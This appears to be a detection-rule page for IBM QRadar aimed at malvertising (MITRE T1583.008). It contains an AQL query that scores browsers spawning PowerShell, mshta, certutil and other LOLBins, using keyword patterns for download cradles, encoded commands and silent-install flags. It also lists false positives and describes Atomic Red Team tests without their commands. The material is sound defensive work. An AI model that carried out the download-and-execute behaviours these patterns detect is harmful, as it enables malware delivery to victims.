T1583.008 IBM QRadar · QRadar

Detect Malvertising in IBM QRadar

Adversaries may purchase online advertisements to distribute malware to victims. Ads can be positioned prominently in search results or on popular websites, exploiting user trust in those platforms. Malvertising campaigns frequently spoof legitimate software vendors, tricking users into downloading trojanized installer packages. Because the adversary's infrastructure purchase occurs entirely outside the victim environment, detection must pivot to observable victim-side indicators: browsers spawning unexpected child processes, executable file downloads staged in user-writable directories, and drive-by script execution patterns consistent with clicking a malicious ad.

MITRE ATT&CK

Tactic
Resource Development
Technique
T1583 Acquire Infrastructure
Sub-technique
T1583.008 Malvertising
Canonical reference
https://attack.mitre.org/techniques/T1583/008/

QRadar Detection Query

IBM QRadar (QRadar)
sql 
SELECT
  DATEFORMAT(devicetime, 'yyyy-MM-dd HH:mm:ss') AS event_time,
  logsourcename(logsourceid) AS log_source,
  "username",
  "sourceip",
  QIDNAME(qid) AS event_name,
  "Process Name" AS child_process,
  "Command" AS command_line,
  "Parent Process Name" AS parent_process,
  CASE
    WHEN ("Command" ILIKE '%\\Downloads\\%' OR "Command" ILIKE '%\\Temp\\%' OR "Command" ILIKE '%AppData\\Local\\Temp%') THEN 1 ELSE 0
  END +
  CASE
    WHEN ("Command" ILIKE '%http://%' OR "Command" ILIKE '%https://%' OR "Command" ILIKE '%ftp://%') THEN 1 ELSE 0
  END +
  CASE
    WHEN (LOWER("Command") ILIKE '%-enc%' OR LOWER("Command") ILIKE '%-encodedcommand%' OR
         LOWER("Command") ILIKE '%downloadstring%' OR LOWER("Command") ILIKE '%downloadfile%' OR
         LOWER("Command") ILIKE '%webclient%' OR LOWER("Command") ILIKE '%invoke-webrequest%' OR
         LOWER("Command") ILIKE '%iex(%') THEN 1 ELSE 0
  END +
  CASE
    WHEN (LOWER("Command") ILIKE '%-windowstyle hidden%' OR LOWER("Command") ILIKE '%-w hidden%' OR
         LOWER("Command") ILIKE '%/quiet%' OR LOWER("Command") ILIKE '%/silent%' OR
         LOWER("Command") ILIKE '%/verysilent%') THEN 1 ELSE 0
  END + 1 AS suspicion_score
FROM events
WHERE
  LOGSOURCETYPEID IN (12, 119, 382)
  AND ("Event ID" = '1' OR "Event ID" = '4688')
  AND (
    LOWER("Parent Process Name") ILIKE '%chrome.exe' OR
    LOWER("Parent Process Name") ILIKE '%msedge.exe' OR
    LOWER("Parent Process Name") ILIKE '%firefox.exe' OR
    LOWER("Parent Process Name") ILIKE '%iexplore.exe' OR
    LOWER("Parent Process Name") ILIKE '%opera.exe' OR
    LOWER("Parent Process Name") ILIKE '%brave.exe'
  )
  AND (
    LOWER("Process Name") ILIKE '%powershell.exe' OR
    LOWER("Process Name") ILIKE '%pwsh.exe' OR
    LOWER("Process Name") ILIKE '%cmd.exe' OR
    LOWER("Process Name") ILIKE '%mshta.exe' OR
    LOWER("Process Name") ILIKE '%wscript.exe' OR
    LOWER("Process Name") ILIKE '%cscript.exe' OR
    LOWER("Process Name") ILIKE '%rundll32.exe' OR
    LOWER("Process Name") ILIKE '%regsvr32.exe' OR
    LOWER("Process Name") ILIKE '%msiexec.exe' OR
    LOWER("Process Name") ILIKE '%certutil.exe' OR
    LOWER("Process Name") ILIKE '%bitsadmin.exe'
  )
  AND LAST(devicetime) > NOW() - 86400000
ORDER BY suspicion_score DESC, devicetime DESC
high severity medium confidence

AQL query for IBM QRadar correlating Windows Sysmon EventID 1 (Process Create) and Security EventID 4688 (New Process) to identify browsers spawning LOLBin or interpreter child processes. A multi-factor suspicion score is computed inline using CASE expressions matching download paths, network URLs, encoded-command tokens, and silent-install flags — mirroring the reference SPL scoring logic. Results are ordered by suspicion score descending for analyst triage.

Data Sources

Windows Sysmon (QRadar DSM)Microsoft Windows Security Event Log

Required Tables

events

False Positives & Tuning

  • Corporate patch management solutions that trigger browser-based authentication portals and subsequently call msiexec.exe or cmd.exe to apply updates silently (/quiet).
  • Internal web applications that launch helper executables via browser protocol handlers (e.g., custom URI schemes), producing a browser→child-process chain with no malicious intent.
  • Security awareness training platforms that simulate phishing/malvertising behavior in a controlled sandbox, generating real process-create events with matching parent-child patterns.
Download portable Sigma rule (.yml)

Other platforms for T1583.008

Microsoft Sentinel (KQL) Splunk (SPL) Elastic Security (Elastic) Sumo Logic CSE (Sumo) Google Chronicle (YARA-L) CrowdStrike LogScale (LogScale) All platforms (combined) →

Testing Methodology

Validate this detection against 4 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1Simulate Browser Spawning PowerShell (Malvertising Drive-by Pattern)

    Expected signal: Sysmon Event ID 1: Process Create with Image=powershell.exe, ParentImage=cmd.exe, CommandLine containing '-WindowStyle Hidden'. Sysmon Event ID 11: File Create for malv-test.txt in Temp. Security Event ID 4688 (if command line auditing enabled). PowerShell ScriptBlock Log Event ID 4104 showing Write-Output command.

  2. Test 2Stage and Execute Trojanized Installer from Downloads Folder

    Expected signal: Sysmon Event ID 11: File Create for 7zip-2400-x64.exe in the Downloads folder. Sysmon Event ID 1: Process Create with Image path inside the Downloads folder — anomalous for any legitimate software. Security Event ID 4688 if command line auditing is enabled.

  3. Test 3HTA Drive-by Execution Simulating Malvertising Redirect

    Expected signal: Sysmon Event ID 1: Process Create for mshta.exe with TargetFilename in Temp path. Sysmon Event ID 11: File Create for hta-atomic.txt. Security Event ID 4688 for mshta.exe execution. If launched from a browser parent, the main detection fires on mshta.exe as a SuspiciousChild with DownloadPath=1.

  4. Test 4PowerShell Download Cradle Spawned from Browser Context (Simulated Raspberry Robin Pattern)

    Expected signal: Sysmon Event ID 1: Process Create for powershell.exe, ParentImage=cmd.exe, CommandLine containing 'Net.WebClient' and 'DownloadString'. Sysmon Event ID 3: Network connection attempt to 127.0.0.1:18080 (connection refused, but event still fires). PowerShell ScriptBlock Log Event ID 4104 showing the download cradle code.

Last updated: 2026-04-13 Research depth: deep
References (7)

Unlock Pro Content

Get the full detection package for T1583.008 including response playbook, investigation guide, and atomic red team tests.

Response PlaybookInvestigation GuideHunting QueriesAtomic Red Team TestsTuning Guidance
Sign Up for Pro View Pricing

Related Detections

Parent Technique

T1583Acquire Infrastructure

Related Sub-techniques

T1583.001DomainsT1583.002DNS ServerT1583.003Virtual Private ServerT1583.004ServerT1583.005BotnetT1583.006Web ServicesT1583.007Serverless

Related Techniques

T1583Acquire InfrastructureT1583.001DomainsT1608.004Drive-by TargetT1189Drive-by CompromiseT1204.002Malicious FileT1036.005Match Legitimate Resource Name or LocationT1553.002Code SigningT1059.001PowerShellT1105Ingress Tool TransferT1056.003Web Portal Capture

Same Tactic: Resource Development

Popular Detections